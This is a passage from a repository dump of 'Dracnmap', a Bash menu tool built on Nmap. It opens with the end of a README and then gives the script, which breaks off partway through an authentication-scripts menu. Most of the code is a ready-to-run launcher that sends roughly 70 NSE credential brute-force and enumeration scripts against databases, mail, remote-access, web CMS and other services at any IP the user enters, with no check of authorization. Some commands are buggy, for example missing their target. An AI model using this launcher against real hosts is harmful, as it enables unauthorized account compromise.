Discovery Techniques 72 | - Nmap Cheat Sheet (PDF) - 8ack 73 | - Nmap - A Stealth Port Scanner - Villanova Computer Science 74 | - Nmap Quick Reference Guide - SCADAhacker 75 | 76 | ## Disclaimer 77 | 78 | ***Note: modifications, changes, or alterations to this sourcecode is acceptable, however,any public releases utilizing this code must be approved by writen this tool ( Edo -m- ).*** 79 | -------------------------------------------------------------------------------- /dracnmap-v2.2-dracOs.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | 3 | #============================================================================================================ 4 | # Dracnmap for dracos 5 | # 6 | # Welcome and dont disclaimer 7 | # Dracnmap Author By Edo -maland- a.k.a screetsec 8 | # Tested On Kali Linux and Dracos 9 | # contact me in screetsec@gmail.com or screetsec@dracos-linux.org 10 | # OS Penetration From Indonesia : https://dracos-linux.org/ 11 | #============================================================================================================ 12 | 13 | 14 | #This colour 15 | cyan='\e[0;36m' 16 | green='\e[0;34m' 17 | okegreen='\033[92m' 18 | lightgreen='\e[1;32m' 19 | white='\e[1;37m' 20 | red='\e[1;31m' 21 | yellow='\e[1;33m' 22 | BlueF='\e[1;34m' 23 | 24 | 25 | #Variable 26 | Version='2.2' 27 | Codename='Redline' 28 | xterm='xterm -hold -fa monaco -fs 13 -bg black -e nmap' 29 | urxvt='urxvt -hold -e nmap' 30 | output=`pwd` 31 | 32 | 33 | trap ctrl_c INT 34 | ctrl_c() { 35 | clear 36 | echo -e $red"[*] (Ctrl + C ) Detected, Trying To Exit ..." 37 | sleep 1 38 | echo "" 39 | echo -e $yellow"[*] Thank You For Using Dracnmap =)." 40 | echo "" 41 | echo -e $yellow"[*] Check Dracos Linux LFS, Penetration OS From Indonesia =P." 42 | exit 43 | } 44 | 45 | #Bebeku 46 | if [[ $EUID -ne 0 ]]; then 47 | echo "ERROR! Run this script with root user!" 48 | exit 1 49 | fi 50 | 51 | if [ -z "${DISPLAY:-}" ]; then 52 | echo -e "\e[1;31mThe script should be executed inside a X (graphical) session."$transparent"" 53 | exit 1 54 | fi 55 | resize -s 50 84 > /dev/null 56 | 57 | ############################################### 58 | # Checking gaannss 59 | ############################################### 60 | clear 61 | echo -e $okegreen "" 62 | echo -e $okegreen " .___ _______ $red ________ "; 63 | echo -e $okegreen " __| _/___________ ____ \ \ _____ _____ ______ $red ___ _\_____ \ "; 64 | echo -e $okegreen " / __ |\_ __ \__ \ _/ ___\ / | \ / \\__ \ \____ \ $red \ \/ // ____/ "; 65 | echo -e $okegreen "/ /_/ | | | \// __ \\ \___/ | \ Y Y \/ __ \| |_> >$red \ // \ "; 66 | echo -e $okegreen "\____ | |__| (____ /\___ >____|__ /__|_| (____ / __/ $red/\ \_/ \_______ \ "; 67 | echo -e $okegreen " \/ \/ \/ \/ \/ \/|__| $red\/ \/ "; 68 | echo 69 | echo -e $okegreen"-------------------------------------------------------------------------------" 70 | echo -e $lightgreen'-- -- +=[(c) 2016-2017 | dracos-linux.org | Linuxsec.org | Pentester Indonesia ' 71 | echo -e $cyan'-- -- +=[ Author: Screetsec < Edo Maland > ]=+ -- -- ' 72 | echo -e " " 73 | 74 | if [ $(id -u) != "0" ]; then 75 | 76 | echo [!]::[Check Dependencies] ; 77 | sleep 2 78 | echo [✔]::[Check User]: $USER ; 79 | sleep 1 80 | echo [x]::[not root]: you need to be [root] to run this script.; 81 | echo "" 82 | sleep 1 83 | exit 84 | 85 | 86 | else 87 | 88 | echo [!]::[Check Dependencies]: ; 89 | sleep 1 90 | echo [✔]::[Check User]: $USER ; 91 | 92 | fi 93 | 94 | ping -c 1 google.com > /dev/null 2>&1 95 | if [ "$?" != 0 ] 96 | 97 | then 98 | 99 | echo [✔]::[Internet Connection]: DONE!; 100 | echo [x]::[warning]: This Script Needs An Active Internet Connection; 101 | sleep 2 102 | 103 | else 104 | 105 | echo [✔]::[Internet Connection]: connected!; 106 | sleep 2 107 | fi 108 | 109 | # check nmap if exists 110 | which nmap > /dev/null 2>&1 111 | if [ "$?" -eq "0" ]; then 112 | echo [✔]::[nmap]: installation found!; 113 | else 114 | 115 | echo [x]::[warning]:this script require Nmap ; 116 | echo "" 117 | echo [!]::[please wait]: please install .... ; 118 | apt-get update 119 | apt-get install nmap 120 | echo "" 121 | sleep 2 122 | exit 123 | fi 124 | sleep 2 125 | # check urxvt if exists 126 | which xterm > /dev/null 2>&1 127 | if [ "$?" -eq "0" ]; then 128 | echo [✔]::[xterm]: installation found!; 129 | else 130 | 131 | echo [x]::[warning]:this script require xterm ; 132 | echo "" 133 | echo [!]::[please wait]: please install .... ; 134 | apt-get update 135 | apt-get install xterm 136 | echo "" 137 | sleep 2 138 | exit 139 | fi 140 | sleep 2 141 | 142 | 143 | 144 | 145 | 146 | 147 | 148 | ################################################ 149 | # OUTPUT FILE 150 | ################################################ 151 | function scanoutput() { 152 | echo -e $cyan " " 153 | clear 154 | echo " " 155 | echo " " 156 | echo -e $okegreen" /^--^\ /^--^\ /^--^\ $cyan" 157 | echo -e $okegreen" \____/ \____/ \____/ $cyan " 158 | echo -e $okegreen" / \ / \ / \ $cyan" 159 | echo -e $okegreen" | | | | | | $cyan " 160 | echo -e $okegreen" \__ __/ \__ __/ \__ __/ $cyan MEONG MOEONG " 161 | echo " |^|^|^|^|^|^|^|^|^|^|^|^\ \^|^|^|^/ /^|^|^|^|^\ \^|^|^|^|^|^|^|^|^|^|^|^| " 162 | echo " | | | | | | | | | | | | |\ \| | |/ /| | | | | | \ \ | | | | | | | | | | | " 163 | echo " ########################/ /######\ \###########/ /####################### " 164 | echo " | | | | | | | | | | | | \/| | | | \/| | | | | |\/ | | | | | | | | | | | | " 165 | echo " |_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_| " 166 | echo -e $white " " 167 | echo -e $white" [$okegreen"01"$white]$okegreen OUTPUT SCAN IN XML FORMATS " 168 | echo -e $white" [$okegreen"02"$white]$okegreen OUTPUT SCAN IN HTML FORMATS " 169 | echo -e $white" [$okegreen"03"$white]$okegreen OUTPUT SCAN IN NORMAL FORMATS " 170 | echo -e $white" [$okegreen"04"$white]$okegreen OUTPUT SCAN IN GREPABLE FORMATS " 171 | echo -e $white" [$okegreen"05"$white]$okegreen BACK " 172 | echo -e " " 173 | echo -n -e $red' \033[4mScreetsec@Meoong:\033[0m>> '; tput sgr0 #insert your choice 174 | read DrS 175 | 176 | if test $DrS == '1' 177 | then 178 | echo 179 | echo -ne $cyan" Path Location: $HOME/" 180 | echo 181 | echo -ne " Name of Report:" 182 | read namafile 183 | echo 184 | echo -ne " What is your IP Target or Host: " 185 | read ip 186 | echo 187 | $urxvt -A -O -oX $HOME/$namafile.xml $ip & 188 | firefox $HOME/$namafile.xml 189 | elif test $DrS == '2' 190 | then 191 | echo 192 | echo -ne $cyan" Path Location: $HOME/" 193 | echo 194 | echo -ne " Name of Report:" 195 | read namafile 196 | echo 197 | echo -ne " What is your IP Target or Host: " 198 | read ip 199 | echo 200 | $urxvt -A -O -oX $HOME/$namafile.xml $ip & 201 | xsltproc $HOME/$namafile.xml -o $HOME/$namafile.html 202 | firefox $HOME/$namafile.html 203 | elif test $DrS == '3' 204 | then 205 | echo 206 | echo -ne $cyan" Path Location: $HOME/" 207 | echo 208 | echo -ne " Name of Report:" 209 | read namafile 210 | echo 211 | echo -ne " What is your IP Target or Host: " 212 | read ip 213 | echo 214 | $urxvt -F -oN $HOME/$namafile.txt $ip & 215 | nano $HOME/$namafile.txt 216 | elif test $DrS == '4' 217 | then 218 | echo 219 | echo -ne $cyan" Path Location: $HOME/" 220 | echo 221 | echo -ne " Name of Report:" 222 | read namafile 223 | echo 224 | echo -ne " What is your IP Target or Host: " 225 | read ip 226 | echo 227 | $urxvt -F -oG $HOME/$namafile.grep $ip & 228 | nano $HOME/$namafile.grep 229 | elif test $DrS == '5' 230 | then 231 | menu 232 | else 233 | echo -e " Incorrect Number" 234 | fi 235 | echo -n -e " Back to Last Menu? ( Yes / No ) :" 236 | read back 237 | if [ $back != 'n' ] && [ $back != 'N' ] && [ $back != 'no' ] && [ $back != 'No' ] 238 | then 239 | clear 240 | menu 241 | elif [ $back != 'y' ] && [ $back != 'Y' ] && [ $back != 'yes' ] && [ $back != 'Yes' ] 242 | then 243 | scanoutput 244 | fi 245 | } 246 | 247 | 248 | ################################################ 249 | # NSE SCRIPT FOR BRUTEFORCE 250 | ################################################ 251 | 252 | function brutense () { 253 | clear 254 | echo " "; 255 | 256 | echo -e $white " " 257 | echo -e $white" [$okegreen"01"$white]$cyan afp-brute " 258 | echo -e $white" [$okegreen"02"$white]$cyan ajp-brute " 259 | echo -e $white" [$okegreen"03"$white]$cyan backorifice-brute " 260 | echo -e $white" [$okegreen"04"$white]$cyan cassandra-brute " 261 | echo -e $white" [$okegreen"05"$white]$cyan cics-enum " 262 | echo -e $white" [$okegreen"06"$white]$cyan cics-user-enum " 263 | echo -e $white" [$okegreen"07"$white]$cyan citrix-brute-xml" 264 | echo -e $white" [$okegreen"08"$white]$cyan cvs-brute " 265 | echo -e $white" [$okegreen"09"$white]$cyan cvs-brute-repository " 266 | echo -e $white" [$okegreen"10"$white]$cyan domcon-brute " 267 | echo -e $white" [$okegreen"11"$white]$cyan dpap-enum " 268 | echo -e $white" [$okegreen"12"$white]$cyan drda-brute " 269 | echo -e $white" [$okegreen"13"$white]$cyan ftp-brute " 270 | echo -e $white" [$okegreen"14"$white]$cyan http-from-brute " 271 | echo -e $white" [$okegreen"15"$white]$cyan http-iis-short-name-brute " 272 | echo -e $white" [$okegreen"16"$white]$cyan http-brute " 273 | echo -e $white" [$okegreen"17"$white]$cyan http-joomla-brute " 274 | echo -e $white" [$okegreen"18"$white]$cyan http-proxy-brute " 275 | echo -e $white" [$okegreen"19"$white]$cyan http-wordpress-brute " 276 | echo -e $white" [$okegreen"20"$white]$cyan iax2-brute " 277 | echo -e $white" [$okegreen"21"$white]$cyan informix-brute " 278 | echo -e $white" [$okegreen"22"$white]$cyan ipmi-brute " 279 | echo -e $white" [$okegreen"23"$white]$cyan irc-brute " 280 | echo -e $white" [$okegreen"24"$white]$cyan irc-sasl-brute " 281 | echo -e $white" [$okegreen"25"$white]$cyan iscsi-brute " 282 | echo -e $white" [$okegreen"26"$white]$cyan ldap-brute " 283 | echo -e $white" [$okegreen"27"$white]$cyan imap-brute " 284 | echo -e $white" [$okegreen"28"$white]$cyan membase-brute " 285 | echo -e $white" [$okegreen"29"$white]$cyan mmouse-brute " 286 | echo -e $white" [$okegreen"30"$white]$cyan mongodb-brute " 287 | echo -e $white" [$okegreen"31"$white]$cyan ms-sql-brute " 288 | echo -e $white" [$okegreen"32"$white]$cyan mysql-brute " 289 | echo -e $white" [$okegreen"33"$white]$cyan mysql-enum " 290 | echo -e $white" [$okegreen"34"$white]$cyan mongodb-brute" 291 | echo -e $white" [$okegreen"35"$white]$cyan metasploit-msgrpc-brute " 292 | echo -e $white" [$okegreen"36"$white]$cyan metasploit-xmlrpc-brute " 293 | echo -e $white" [$okegreen"37"$white]$cyan mikrotik-routeros-brute " 294 | echo -e $white" [$okegreen"38"$white]$cyan nessus-xmlrpc-brute " 295 | echo -e $white" [$okegreen"39"$white]$cyan netbus-brute " 296 | echo -e $white" [$okegreen"40"$white]$cyan nexpose-brute " 297 | echo -e $white" [$okegreen"41"$white]$cyan nje-node-brute " 298 | echo -e $white" [$okegreen"42"$white]$cyan nje-pass-brute " 299 | echo -e $white" [$okegreen"43"$white]$cyan nping-brute " 300 | echo -e $white" [$okegreen"44"$white]$cyan nessus-brute " 301 | echo -e $white" [$okegreen"45"$white]$cyan omp2-brute " 302 | echo -e $white" [$okegreen"46"$white]$cyan openvas-otp-brute " 303 | echo -e $white" [$okegreen"47"$white]$cyan oracle-brute " 304 | echo -e $white" [$okegreen"48"$white]$cyan oracle-brute-stealth " 305 | echo -e $white" [$okegreen"49"$white]$cyan oracle-sid-brute " 306 | echo -e $white" [$okegreen"50"$white]$cyan pcanywhere-brute " 307 | echo -e $white" [$okegreen"51"$white]$cyan pgsql-brute " 308 | echo -e $white" [$okegreen"52"$white]$cyan pop3-brute " 309 | echo -e $white" [$okegreen"53"$white]$cyan redis-brute " 310 | echo -e $white" [$okegreen"54"$white]$cyan rexec-brute " 311 | echo -e $white" [$okegreen"55"$white]$cyan rlogin-brute " 312 | echo -e $white" [$okegreen"56"$white]$cyan rpcap-brute " 313 | echo -e $white" [$okegreen"57"$white]$cyan rsync-brute " 314 | echo -e $white" [$okegreen"58"$white]$cyan rtsp-url-brute " 315 | echo -e $white" [$okegreen"59"$white]$cyan sip-brute " 316 | echo -e $white" [$okegreen"60"$white]$cyan socks-brute " 317 | echo -e $white" [$okegreen"61"$white]$cyan svn-brute " 318 | echo -e $white" [$okegreen"62"$white]$cyan tso-enum " 319 | echo -e $white" [$okegreen"63"$white]$cyan smb-brute " 320 | echo -e $white" [$okegreen"64"$white]$cyan smtp-brute " 321 | echo -e $white" [$okegreen"65"$white]$cyan snmp-brute " 322 | echo -e $white" [$okegreen"66"$white]$cyan telnet-brute " 323 | echo -e $white" [$okegreen"67"$white]$cyan vtam-enum " 324 | echo -e $white" [$okegreen"68"$white]$cyan vmauthd-brute " 325 | echo -e $white" [$okegreen"69"$white]$cyan vnc-brute" 326 | echo -e $white" [$okegreen"70"$white]$cyan xmpp-brute " 327 | echo -e $white" [$okegreen"71"$white]$cyan Back " 328 | echo -e " " 329 | echo -n -e $red' \033[4mScreetsec@nse-brute:\033[0m>> '; tput sgr0 #insert your choice 330 | read Brute 331 | if test $Brute == '1' 332 | then 333 | echo 334 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 335 | read ip 336 | echo -ne $okegreen " Open Port on Target or Host: " ; tput sgr0 337 | read port 338 | $urxvt -p $port --script afp-brute $ip & 339 | elif test $Brute == '2' 340 | then 341 | echo 342 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 343 | read ip 344 | echo -ne $okegreen " Open Port on Target or Host: " ; tput sgr0 345 | read port 346 | $urxvt -p $port $ip --script ajp-brute & 347 | elif test $Brute == '3' 348 | then 349 | echo 350 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 351 | read ip 352 | echo -ne $okegreen " Open Port on Target or Host: " ; tput sgr0 353 | read port 354 | $urxvt -sU --script backorifice-brute $ip --script-args backorifice-brute.ports=$port & 355 | elif test $Brute == '4' 356 | then 357 | echo 358 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 359 | read ip 360 | $urxvt -p 9160 $ip --script=cassandra-brute & 361 | elif test $Brute == '5' 362 | then 363 | echo 364 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 365 | read ip 366 | $urxvt --script=cics-enum -p 23 $ip & 367 | elif test $Brute == '6' 368 | then 369 | echo 370 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 371 | read ip 372 | $urxvt --script=cics-user-enum -p 23 $ip & 373 | elif test $Brute == '7' 374 | then 375 | echo 376 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 377 | read ip 378 | echo -ne $okegreen " What Userdb " ; tput sgr0 379 | read userdb 380 | echo -ne $okegreen " What Passdb " ; tput sgr0 381 | read passdb 382 | echo -ne $okegreen " What domain " ; tput sgr0 383 | read domain 384 | $urxvt --script=citrix-brute-xml --script-args=userdb=$userdb,passdb=$passdb,ntdomain=$domain -p 80,443,8080 $ip & 385 | elif test $Brute == '8' 386 | then 387 | echo 388 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 389 | read ip 390 | $urxvt -p 2401 --script cvs-brute $ip & 391 | elif test $Brute == '9' 392 | then 393 | echo 394 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 395 | read ip 396 | $urxvt -p 2401 --script cvs-brute-repository $ip & 397 | elif test $Brute == '10' 398 | then 399 | echo 400 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 401 | read ip 402 | $urxvt --script domcon-brute -p 2050 $ip & 403 | elif test $Brute == '11' 404 | then 405 | echo 406 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 407 | read ip 408 | $urxvt --script dpap-brute -p 8770 $ip & 409 | elif test $Brute == '12' 410 | then 411 | echo 412 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 413 | read ip 414 | $urxvt -p 50000 --script drda-brute $ip & 415 | elif test $Brute == '13' 416 | then 417 | echo 418 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 419 | read ip 420 | echo -ne $okegreen " Open Port on Target or Host: " ; tput sgr0 421 | read port 422 | $urxvt --script ftp-brute -p $port $ip & 423 | elif test $Brute == '14' 424 | then 425 | echo 426 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 427 | read ip 428 | $urxvt --script http-form-brute -p 80 $ip & 429 | elif test $Brute == '15' 430 | then 431 | echo 432 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 433 | read ip 434 | $urxvt -p80 --script http-iis-short-name-brute $ip & 435 | elif test $Brute == '16' 436 | then 437 | echo 438 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 439 | read ip 440 | echo -ne $okegreen " Open Port on Target or Host: " ; tput sgr0 441 | read port 442 | $urxvt --script http-brute -p $port $ip & 443 | elif test $Brute == '17' 444 | then 445 | echo 446 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 447 | read ip 448 | $urxvt -sV --script http-joomla-brute $ip & 449 | elif test $Brute == '18' 450 | then 451 | echo 452 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 453 | read ip 454 | $urxvt --script http-proxy-brute -p 8080 $ip & 455 | elif test $Brute == '19' 456 | then 457 | echo 458 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 459 | read ip 460 | $urxvt -sV --script http-wordpress-brute $ip & 461 | elif test $Brute == '20' 462 | then 463 | echo 464 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 465 | read ip 466 | $urxvt -sU -p 4569 $ip --script iax2-brute & 467 | elif test $Brute == '21' 468 | then 469 | echo 470 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 471 | read ip 472 | $urxvt --script informix-brute -p 9088 $ip & 473 | elif test $Brute == '22' 474 | then 475 | echo 476 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 477 | read ip 478 | $urxvt -sU --script ipmi-brute -p 623 $ip & 479 | elif test $Brute == '23' 480 | then 481 | echo 482 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 483 | read ip 484 | $urxvt --script irc-brute -p 6667 $ip & 485 | elif test $Brute == '24' 486 | then 487 | echo 488 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 489 | read ip 490 | $urxvt --script irc-sasl-brute -p 6667 $ip & 491 | elif test $Brute == '25' 492 | then 493 | echo 494 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 495 | read ip 496 | $urxvt -sV --script=iscsi-brute $ip & 497 | elif test $Brute == '26' 498 | then 499 | echo 500 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 501 | read ip 502 | $urxvt -p 389 --script ldap-brute --script-args ldap.base='"cn=users,dc=cqure,dc=net"' $ip & 503 | elif test $Brute == '27' 504 | then 505 | echo 506 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 507 | read ip 508 | $urxvt -p 143,993 --script imap-brute $ip & 509 | elif test $Brute == '28' 510 | then 511 | echo 512 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 513 | read ip 514 | $urxvt -p 11211 --script membase-brute & 515 | elif test $Brute == '29' 516 | then 517 | echo 518 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 519 | read ip 520 | $urxvt --script mmouse-brute -p 51010 $ip & 521 | elif test $Brute == '30' 522 | then 523 | echo 524 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 525 | read ip 526 | $urxvt -p 27017 $ip --script mongodb-brute & 527 | elif test $Brute == '31' 528 | then 529 | echo 530 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 531 | read ip 532 | $urxvt -p 445 --script ms-sql-brute --script-args mssql.instance-all,userdb=customuser.txt,passdb=custompass.txt $ip & 533 | elif test $Brute == '32' 534 | then 535 | echo 536 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 537 | read ip 538 | $urxvt --script=mysql-brute $ip 539 | elif test $Brute == '33' 540 | then 541 | echo 542 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 543 | read ip 544 | nmap --script=mysql-enum $ip & 545 | elif test $Brute == '34' 546 | then 547 | echo 548 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 549 | read ip 550 | $urxvt -p 27017 $ip --script mongodb-brute & 551 | elif test $Brute == '35' 552 | then 553 | echo 554 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 555 | read ip 556 | $urxvt --script metasploit-msgrpc-brute -p 55553 $ip & 557 | elif test $Brute == '36' 558 | then 559 | echo 560 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 561 | read ip 562 | $urxvt --script metasploit-xmlrpc-brute -p 55553 $ip & 563 | elif test $Brute == '37' 564 | then 565 | echo 566 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 567 | read ip 568 | $urxvt -p 8728 --script mikrotik-routeros-brute $ip & 569 | elif test $Brute == '38' 570 | then 571 | echo 572 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 573 | read ip 574 | $urxvt -sV --script=nessus-xmlrpc-brute $ip & 575 | elif test $Brute == '39' 576 | then 577 | echo 578 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 579 | read ip 580 | $urxvt -p 12345 --script netbus-brute $ip & 581 | elif test $Brute == '40' 582 | then 583 | echo 584 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 585 | read ip 586 | $urxvt --script nexpose-brute -p 3780 $ip & 587 | elif test $Brute == '41' 588 | then 589 | echo 590 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 591 | read ip 592 | $urxvt -sV --script=nje-node-brute $ip & 593 | elif test $Brute == '42' 594 | then 595 | echo 596 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 597 | read ip 598 | $urxvt --script=nje-pass-brute --script-args=ohost='POTATO',rhost='CACTUS',sleep=5 -p 175 $ip & 599 | elif test $Brute == '43' 600 | then 601 | echo 602 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 603 | read ip 604 | $urxvt -p 9929 --script nping-brute $ip & 605 | elif test $Brute == '44' 606 | then 607 | echo 608 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 609 | read ip 610 | $urxvt --script nessus-brute -p 1241 $ip & 611 | elif test $Brute == '45' 612 | then 613 | echo 614 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 615 | read ip 616 | $urxvt -p 9390 --script omp2-brute $ip & 617 | elif test $Brute == '46' 618 | then 619 | echo 620 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 621 | read ip 622 | $urxvt -sV --script=openvas-otp-brute $ip & 623 | elif test $Brute == '47' 624 | then 625 | echo 626 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 627 | read ip 628 | $urxvt --script oracle-brute -p 1521 --script-args oracle-brute.sid=ORCL $ip & 629 | elif test $Brute == '48' 630 | then 631 | echo 632 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 633 | read ip 634 | $urxvt --script oracle-brute-stealth -p 1521 --script-args oracle-brute-stealth.sid=ORCL $ip & 635 | elif test $Brute == '49' 636 | then 637 | echo 638 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 639 | read ip 640 | $urxvt --script=oracle-sid-brute -p 1521-1560 $ip & 641 | elif test $Brute == '50' 642 | then 643 | echo 644 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 645 | read ip 646 | $urxvt --script=pcanywhere-brute $ip & 647 | elif test $Brute == '51' 648 | then 649 | echo 650 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 651 | read ip 652 | $urxvt -p 5432 --script pgsql-brute $ip & 653 | elif test $Brute == '52' 654 | then 655 | echo 656 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 657 | read ip 658 | $urxvt -sV --script=pop3-brute $ip & 659 | elif test $Brute == '53' 660 | then 661 | echo 662 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 663 | read ip 664 | $urxvt -p 6379 $ip --script redis-brute & 665 | elif test $Brute == '54' 666 | then 667 | echo 668 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 669 | read ip 670 | $urxvt -p 512 --script rexec-brute $ip & 671 | elif test $Brute == '55' 672 | then 673 | echo 674 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 675 | read ip 676 | $urxvt -p 513 --script rlogin-brute $ip & 677 | elif test $Brute == '56' 678 | then 679 | echo 680 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 681 | read ip 682 | $urxvt -p 2002 $ip --script rpcap-brute & 683 | elif test $Brute == '57' 684 | then 685 | echo 686 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 687 | read ip 688 | $urxvt -p 873 --script rsync-brute --script-args 'rsync-brute.module=www' $ip & 689 | elif test $Brute == '58' 690 | then 691 | echo 692 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 693 | read ip 694 | $urxvt --script rtsp-url-brute -p 554 $ip & 695 | elif test $Brute == '59' 696 | then 697 | echo 698 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 699 | read ip 700 | $urxvt -sU -p 5060 $ip --script=sip-brute & 701 | elif test $Brute == '60' 702 | then 703 | echo 704 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 705 | read ip 706 | $urxvt --script socks-brute -p 1080 $ip & 707 | elif test $Brute == '61' 708 | then 709 | echo 710 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 711 | read ip 712 | $urxvt --script svn-brute --script-args svn-brute.repo=/svn/ -p 3690 $ip & 713 | elif test $Brute == '62' 714 | then 715 | echo 716 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 717 | read ip 718 | $urxvt --script=tso-enum -p 23 $ip & 719 | elif test $Brute == '63' 720 | then 721 | echo 722 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 723 | read ip 724 | $urxvt -sU -sS --script smb-brute.nse -p U:137,T:139 & 725 | elif test $Brute == '64' 726 | then 727 | echo 728 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 729 | read ip 730 | $urxvt -p 25 --script smtp-brute $ip & 731 | elif test $Brute == '65' 732 | then 733 | echo 734 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 735 | read ip 736 | echo -ne $okegreen " Located Wordlist ? : " ; tput sgr0 737 | read wordlist 738 | $urxvt -sU --script snmp-brute $ip [--script-args snmp-brute.communitiesdb=$wordlist ] & 739 | elif test $Brute == '66' 740 | then 741 | echo 742 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 743 | read ip 744 | echo -ne $okegreen " Open Port on Target or Host (23): " ; tput sgr0 745 | read port 746 | $urxvt -p $port --script telnet-brute --script-args userdb=myusers.lst,passdb=mypwds.lst,telnet-brute.timeout=8s $ip & 747 | elif test $Brute == '67' 748 | then 749 | echo 750 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 751 | read ip 752 | $urxvt --script vtam-enum -p 23 $ip & 753 | elif test $Brute == '68' 754 | then 755 | echo 756 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 757 | read ip 758 | $urxvt -p 902 $ip --script vmauthd-brute & 759 | elif test $Brute == '69' 760 | then 761 | echo 762 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 763 | read ip 764 | $urxvt --script vnc-brute -p 5900 $ip & 765 | elif test $Brute == '70' 766 | then 767 | echo 768 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 769 | read ip 770 | $urxvt -p 5222 --script xmpp-brute $ip & 771 | elif test $Brute == '71' 772 | then 773 | nse 774 | else 775 | echo "" 776 | echo -e $okegreen " Incorrect Number" 777 | fi 778 | echo "" 779 | echo "" 780 | echo -n -e $red " Back to Last Menu? ( Yes / No ) :" 781 | read back 782 | if [ $back != 'n' ] && [ $back != 'N' ] && [ $back != 'no' ] && [ $back != 'No' ] 783 | then 784 | clear 785 | menu 786 | elif [ $back != 'y' ] && [ $back != 'Y' ] && [ $back != 'yes' ] && [ $back != 'Yes' ] 787 | then 788 | brutense 789 | fi 790 | } 791 | 792 | function auth () { 793 | clear 794 | echo 795 | echo 796 | echo -e $white" [$okegreen"01"$white]$cyan ajp-auth " 797 | echo -e $white" [$okegreen"02"$white]$cyan creds-summary " 798 | echo -e $white" [$okegreen"03"$white]$cyan domcon-cmd " 799 | echo -e $white" [$okegreen"04"$white]$cyan domino-enum-users " 800 | echo -e $white" [$okegreen"05"$white]$cyan ftp-anon " 801 | echo -e $white" [$okegreen"06"$white]$cyan http-auth " 802 | echo -e $white" [$okegreen"07"$white]$cyan http-barracuda-dir-traversal " 803 | echo -e $white" [$okegreen"08"$white]$cyan http-config-backup " 804 | echo -e $white" [$okegreen"09"$white]$cyan http-default-accounts " 805 | echo -e $white" [$okegreen"10"$white]$cyan http-domino-enum-passwords " 806 | echo -e $white" [$okegreen"11"$white]$cyan http-method-tamper " 807 | echo -e $white" [$okegreen"12"$white]$cyan http-userdir-enum " 808 | echo -e $white" [$okegreen"13"$white]$cyan http-vuln-cve2010-0738 " 809 | echo -e $white" 